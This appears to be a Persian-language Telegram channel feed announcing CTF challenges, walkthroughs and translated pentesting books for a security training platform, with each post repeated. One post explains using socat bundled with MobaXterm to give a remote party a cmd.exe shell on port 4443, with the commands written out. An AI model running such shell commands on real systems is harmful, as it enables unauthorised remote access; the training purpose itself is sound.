✔️ یکی از مواردی که در حوزه ارزیابی آسیب پذیری به آن توصیه شده و در دوره هایی ماننده SEC504 و SEC460 به آن پرداخته شده است، ممیزی کلمات عبور استفاده شده در سازمان یا شرکت است.
✅ در صورتی که این کلمات عبور قابل کرک شدن باشند، باید آماری از آن ها بدست آورد تا دید مناسبی در خصوص کلمات عبور استفاده شده در سازمان برای مدیران شبکه و امنیت سازمان فراهم شود.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/active-directory-password-audit
✅ در صورتی که این کلمات عبور قابل کرک شدن باشند، باید آماری از آن ها بدست آورد تا دید مناسبی در خصوص کلمات عبور استفاده شده در سازمان برای مدیران شبکه و امنیت سازمان فراهم شود.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/active-directory-password-audit
Forwarded from securityworld
Pentesting Active Directory-Final.pdf
31.1 MB
✅ کتاب فارسی تست نفوذ اکتیودایرکتوری
🔸 این کتاب ترجمه کتاب Pentesting Active Directory and Windows-based Infrastructure می باشد.
🔴 تهیه شده توسط تیم تولید محتوای سایت دنیای امنیت - احسان نیک آور
🌐 https://securityworld.ir
🌐 https://t.iss.one/irsecurityworld
🔸 این کتاب ترجمه کتاب Pentesting Active Directory and Windows-based Infrastructure می باشد.
🔴 تهیه شده توسط تیم تولید محتوای سایت دنیای امنیت - احسان نیک آور
🌐 https://securityworld.ir
🌐 https://t.iss.one/irsecurityworld
✔️ یکی از مراحل تست نفوذ شبکه، اسکن شبکه و پورت است. ابزارهای مختلفی برای این منظور وجود دارد ولی یکی از ابزارهای رایج، Nmap است.
✅ در این چالش، سرویس هایی بر روی ماشین مجازی قرار داده شده است. ابتدا می بایست با Nmap یا ابزار مشابه فرآیند اسکن را انجام دهید و این سرویس ها را شناسایی نمایید. سپس با توجه به سرویس های شناسایی شده، فایل حاوی Flag را پیدا کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/network-scanning
✅ در این چالش، سرویس هایی بر روی ماشین مجازی قرار داده شده است. ابتدا می بایست با Nmap یا ابزار مشابه فرآیند اسکن را انجام دهید و این سرویس ها را شناسایی نمایید. سپس با توجه به سرویس های شناسایی شده، فایل حاوی Flag را پیدا کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/network-scanning
✔️ یکی از مواردی که باید در فرآیند جمع آوری اطلاعات به آن توجه شود، اطلاعات و فایل های بدست آمده است.
✅ در صورت استخراج هر فایلی در این مرحله، اقدامات بعدی از جمله متادیتا، نام فایل، محتوای فایل و غیره می تواند منجر به کسب اطلاعات بیشتر و حتی ایجاد دسترسی بالا به برنامه و یا حتی سرور شود.
✅ این چالش که با نام هگمتانه به صورت ماشین مجازی در اختیار شما قرار می گیرد، بر روی همین موضوع تمرکز دارد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/hegmataneh-web-linux
✅ در صورت استخراج هر فایلی در این مرحله، اقدامات بعدی از جمله متادیتا، نام فایل، محتوای فایل و غیره می تواند منجر به کسب اطلاعات بیشتر و حتی ایجاد دسترسی بالا به برنامه و یا حتی سرور شود.
✅ این چالش که با نام هگمتانه به صورت ماشین مجازی در اختیار شما قرار می گیرد، بر روی همین موضوع تمرکز دارد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/hegmataneh-web-linux
✅ با سلام و عرض ادب خدمت تمامی دوستان گرامی
ابتدا بر خود لازم می دانیم تا از تمام دوستانی که در هر چه بهتر شدن وب سایت Challenginno و چالش های آن ما را یاری نمودند سپاسگزاری کنیم.
🔴 این پلتفرم هم اکنون با 69 چالش فعال در خدمت دوستان گرامی است.
🔸 با توجه به درخواست دوستان گرامی و همچنین هدفی که برای سایت در نظر داشتیم، بخش وبلاگ که در واقع همان Walkthrough می باشد، در سایت قرار داده شد.
✔️ زین پس رایت آپ مربوط به چالش ها، در بخش مقالات سایت قرار داده می شود.
از همراهی شما دوستان گرامی تشکر می کنیم و امیدواریم بتوانیم نقشی هر چند کوچک در ارتقای سطح دانش امنیت کشور داشته باشیم.
🌐 https://challenginno.ir
ابتدا بر خود لازم می دانیم تا از تمام دوستانی که در هر چه بهتر شدن وب سایت Challenginno و چالش های آن ما را یاری نمودند سپاسگزاری کنیم.
🔴 این پلتفرم هم اکنون با 69 چالش فعال در خدمت دوستان گرامی است.
🔸 با توجه به درخواست دوستان گرامی و همچنین هدفی که برای سایت در نظر داشتیم، بخش وبلاگ که در واقع همان Walkthrough می باشد، در سایت قرار داده شد.
✔️ زین پس رایت آپ مربوط به چالش ها، در بخش مقالات سایت قرار داده می شود.
از همراهی شما دوستان گرامی تشکر می کنیم و امیدواریم بتوانیم نقشی هر چند کوچک در ارتقای سطح دانش امنیت کشور داشته باشیم.
🌐 https://challenginno.ir
✔️ رایت آپ مربوط به چالش قلعه فلک الافلاک هم اکنون در سایت قرار شد.
✅ تمرکز این چالش بر روی جمع آوری اطلاعات از طریق وب است.
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/falakolaflak-web-recon
✅ تمرکز این چالش بر روی جمع آوری اطلاعات از طریق وب است.
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/falakolaflak-web-recon
This media is not supported in your browser
VIEW IN TELEGRAM
عید سعید غدیر خم بر شما دوستان و همراهان گرامی مبارک باد
✔️ رایت آپ مربوط به چالش AD Credential Dump هم اکنون در سایت قرار شد.
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/active-directory-credential-dumping
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/active-directory-credential-dumping
✔️ رایت آپ مربوط به چالش آنالیز بسته های شبکه (Cisco) هم اکنون در سایت قرار شد.
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/cisco-packet-analysis
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/cisco-packet-analysis
✔️ در فرآیند تست نفوذ، انجام اسکن شبکه و پورت، بسیار مهم است. پس از شناسایی IP و پورت های باز یک سیستم در شبکه، می بایست سرویس هایی که بر روی پورت ها در حال فعالیت هستند نیز شناسایی شود.
✅ پس از شناسایی سرویس، نوبت به شناسایی آسیب پذیری موجود بر روی آن است.
✅ این چالش به همین موضوع می پردازد و شما می بایست مراحل مذکور را انجام داده و سرویس آسیب پذیری را شناسایی کنید.
✅ لازم به ذکر است که این چالش،اولین چالش است که در محیط ویندوز ایجاد شده و در سایت قرار می گیرد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/web-service-vulnerabilities-windows
✅ پس از شناسایی سرویس، نوبت به شناسایی آسیب پذیری موجود بر روی آن است.
✅ این چالش به همین موضوع می پردازد و شما می بایست مراحل مذکور را انجام داده و سرویس آسیب پذیری را شناسایی کنید.
✅ لازم به ذکر است که این چالش،اولین چالش است که در محیط ویندوز ایجاد شده و در سایت قرار می گیرد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/web-service-vulnerabilities-windows
✔️ رایت آپ مربوط به چالش ارتقاء سطح دسترسی در لینوکس 3 - Warm-up هم اکنون در سایت قرار شد.
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/linux-privilege-escalation-warm-up
🔴 برای مشاهده این رایت آپ به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/blog/linux-privilege-escalation-warm-up
سلام و عرض ادب خدمت دوستان گرامی
یکی از روش های دسترسی به سیستم هدف و Reverse، استفاده از ابزارهایی مانند netcat هست
ابزار nc یا netcat اغلب توسط سیستم های امنیتی شناسایی می شه
ابزار دیگر که در حوزه red team هم استفاده می شه ابزار socat هست
نکته جالب اینجاست که اگر شما ابزار MobaXterm رو در سیستم داشته باشید به صورت پیش فرض با یک بار اجرای این ابزار بر روی سیستم، socat به همراه تمام DLL های مورد نیاز روی سیستم ایجاد می شوند و دقیقا اجازه ارتباط رو می دهد.
مسیر قرار گرفتن socat در آخرین نسخه ابزار MobaXterm که من نصب کردم به صورت زیر است (پروفایل کاربر):
C:\Users\test\AppData\Roaming\MobaXterm\slash\bin
به نظرم از این ابزار استفاده نشه بهتر هست چراکه با این موضوع فقط نیاز هست که نفوذگر بدونه این نرم افزار نصبه دیگه نیازی به انتقال فایل بر روی سیستم قربانی نداره
دستور ایجاد کانکش جهت تست هم به شکل زیر هست:
Windows:
socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes
Kali:
socat - TCP4:192.168.66.132:4443
یکی از روش های دسترسی به سیستم هدف و Reverse، استفاده از ابزارهایی مانند netcat هست
ابزار nc یا netcat اغلب توسط سیستم های امنیتی شناسایی می شه
ابزار دیگر که در حوزه red team هم استفاده می شه ابزار socat هست
نکته جالب اینجاست که اگر شما ابزار MobaXterm رو در سیستم داشته باشید به صورت پیش فرض با یک بار اجرای این ابزار بر روی سیستم، socat به همراه تمام DLL های مورد نیاز روی سیستم ایجاد می شوند و دقیقا اجازه ارتباط رو می دهد.
مسیر قرار گرفتن socat در آخرین نسخه ابزار MobaXterm که من نصب کردم به صورت زیر است (پروفایل کاربر):
C:\Users\test\AppData\Roaming\MobaXterm\slash\bin
به نظرم از این ابزار استفاده نشه بهتر هست چراکه با این موضوع فقط نیاز هست که نفوذگر بدونه این نرم افزار نصبه دیگه نیازی به انتقال فایل بر روی سیستم قربانی نداره
دستور ایجاد کانکش جهت تست هم به شکل زیر هست:
Windows:
socat -d -d TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes
Kali:
socat - TCP4:192.168.66.132:4443
✔️ یکی از سرویس هایی که در اکثر سازمان ها مورد استفاده قرار می گیرد سرویس Active Directory می باشد.
✅ در صورتی که سرویس Active Directory مورد حمله قرار گرفته و Compromise شود، امکان به خطر افتادن کل شبکه وجود خواهد داشت.
✅ در این چالش رویکرد ما بررسی آسیب پذیری موجود بر روی Active Directory است.
✅ لازم به ذکر است که این چالش اولین چالش مربوط به Active Directory بوده و چالش های دیگر به مرور در سایت قرار داده خواهد شد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/activedirectory-zero
✅ در صورتی که سرویس Active Directory مورد حمله قرار گرفته و Compromise شود، امکان به خطر افتادن کل شبکه وجود خواهد داشت.
✅ در این چالش رویکرد ما بررسی آسیب پذیری موجود بر روی Active Directory است.
✅ لازم به ذکر است که این چالش اولین چالش مربوط به Active Directory بوده و چالش های دیگر به مرور در سایت قرار داده خواهد شد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/activedirectory-zero
Forwarded from securityworld
✅ کتاب آشنایی با پروتکل HTTP
✔️ با توجه به استفاده روز افزون از وب و تکنولوژیهای مربتط با آن، آشنایی با پروتکل HTTP که پایه و اساس ساختار وب را تشکیل میدهد، بسیار حائز اهمیت است.
✔️ این کتاب که ترجمه کتاب HTTP The Definitive Guide است، به معرفی بخشهای مختلف این پروتکل میپردازد.
🔴 دانستن جزئیات مربوط به پروتکل HTTP برای علاقمندان به حوزههای وب، تست نفوذ وب، باگ بانتی، برنامه نویسان، محققین و دانشجویان فناوری اطلاعات بسیار مفید خواهد بود.
🌐 https://securityworld.ir/HTTP/HTTP-Final.pdf
✔️ با توجه به استفاده روز افزون از وب و تکنولوژیهای مربتط با آن، آشنایی با پروتکل HTTP که پایه و اساس ساختار وب را تشکیل میدهد، بسیار حائز اهمیت است.
✔️ این کتاب که ترجمه کتاب HTTP The Definitive Guide است، به معرفی بخشهای مختلف این پروتکل میپردازد.
🔴 دانستن جزئیات مربوط به پروتکل HTTP برای علاقمندان به حوزههای وب، تست نفوذ وب، باگ بانتی، برنامه نویسان، محققین و دانشجویان فناوری اطلاعات بسیار مفید خواهد بود.
🌐 https://securityworld.ir/HTTP/HTTP-Final.pdf
✔️ یکی از فرآیندهایی که بعد از دسترسی یا در مرحله Post Exploitation از آن استفاده میشود، تکنیک های Credential Dumping است.
✅ یکی از روشهایی که در Credential Dumping از آن استفاده میشود، استخراج هش ها از SAM سیستمهای ویندوزی میباشد.
✅ چالش جاری مربوط به همین موضوع میباشد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/sam-dump-password-attacks
✅ یکی از روشهایی که در Credential Dumping از آن استفاده میشود، استخراج هش ها از SAM سیستمهای ویندوزی میباشد.
✅ چالش جاری مربوط به همین موضوع میباشد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/sam-dump-password-attacks
✔️ یکی واحدهای مهم که وجود آن در امنیت بسیار حائز اهمیت است، واحد پاسخگویی به حادثه یا Incident Response است.
✅ در هنگام وقوع یک حادثه، تیم پاسخگویی به حادثه وارد عمل شده و فرآیندهایی را دنبال می کند که از پیش تعریف شده اند و در برخی موارد نیز باید ابتکار عمل خود را داشته باشد.
✅ این چالش که به صورت پرسش و پاسخ و در چندین بخش ایجاد شده است، قصد دارد تا شما را با تیم Incident Response و فرآیندهای موجود در آن آشنا نماید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response
✅ در هنگام وقوع یک حادثه، تیم پاسخگویی به حادثه وارد عمل شده و فرآیندهایی را دنبال می کند که از پیش تعریف شده اند و در برخی موارد نیز باید ابتکار عمل خود را داشته باشد.
✅ این چالش که به صورت پرسش و پاسخ و در چندین بخش ایجاد شده است، قصد دارد تا شما را با تیم Incident Response و فرآیندهای موجود در آن آشنا نماید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/incident-response
✔️ در این چالش، شما باید با تحلیل یک فایل لاگ سیسمون (Sysmon)، فعالیتهای مشکوک و مخرب یک فایل را بر روی یک سیستم عامل ویندوز 10 شناسایی کنید.
✅ فایل لاگ سیسمون ارائه شده را بارگذاری و در یک ابزار تحلیل لاگ (مانند Log Parser، Splunk، یا حتی یک اسکریپت Python) باز کنید.
✅ هدف از این چالش شناسایی فعالیتهای مشکوک و مخرب یک فایل از طریق تحلیل لاگ سیسمون می باشد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/detect-malicious-activity
✅ فایل لاگ سیسمون ارائه شده را بارگذاری و در یک ابزار تحلیل لاگ (مانند Log Parser، Splunk، یا حتی یک اسکریپت Python) باز کنید.
✅ هدف از این چالش شناسایی فعالیتهای مشکوک و مخرب یک فایل از طریق تحلیل لاگ سیسمون می باشد.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/detect-malicious-activity
✔️ آسیب پذیری XSS یا Cross Site Scripting یکی از آسیب پذیری های موجود در وب بوده که در استاندارد OWASP و WSTG نیز به آن اشاره شده است.
✅ این چالش شامل چهار بخش است که در هر بخش شما باید آسیب پذیری XSS را به کمک راهنمایی های موجود در صفحات، اکسپلویت نموده و به فلگ نهایی برسید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/game-with-xss-vulnerability
✅ این چالش شامل چهار بخش است که در هر بخش شما باید آسیب پذیری XSS را به کمک راهنمایی های موجود در صفحات، اکسپلویت نموده و به فلگ نهایی برسید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/game-with-xss-vulnerability
✔️ در یکی از سیستمهای حساس شبکه سازمان، نشانههایی از رفتارهای غیرعادی و مشکوک مشاهده شده است. این سیستم، که تا چندی پیش بهطور معمول فعالیت میکرد، اکنون دچار اختلالات پراکندهای شده که توجه تیم امنیتی را به خود جلب کرده است.
✔️ کاربران گزارش دادهاند که عملکرد سیستم کند شده و برخی از فرآیندها بهطور غیرمنتظرهای خاتمه مییابند.
✅ تیم امنیتی با بررسیهای اولیه، نشانههایی از وجود یک عامل مخرب را در سیستم تشخیص داده است.
✅ وظیفه شما این است که با دقت در میان لاگها و فعالیتهای سیستمی، نشانههای فعالیت این تهدید را شناسایی کنید، مکانیزمهای پنهانکاری و پایداری آن را کشف کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/hunting-hidden-threats
✔️ کاربران گزارش دادهاند که عملکرد سیستم کند شده و برخی از فرآیندها بهطور غیرمنتظرهای خاتمه مییابند.
✅ تیم امنیتی با بررسیهای اولیه، نشانههایی از وجود یک عامل مخرب را در سیستم تشخیص داده است.
✅ وظیفه شما این است که با دقت در میان لاگها و فعالیتهای سیستمی، نشانههای فعالیت این تهدید را شناسایی کنید، مکانیزمهای پنهانکاری و پایداری آن را کشف کنید.
🔴 برای مشاهده چالش به لینک زیر مراجعه نمایید:
🌐 https://challenginno.ir/challenge/hunting-hidden-threats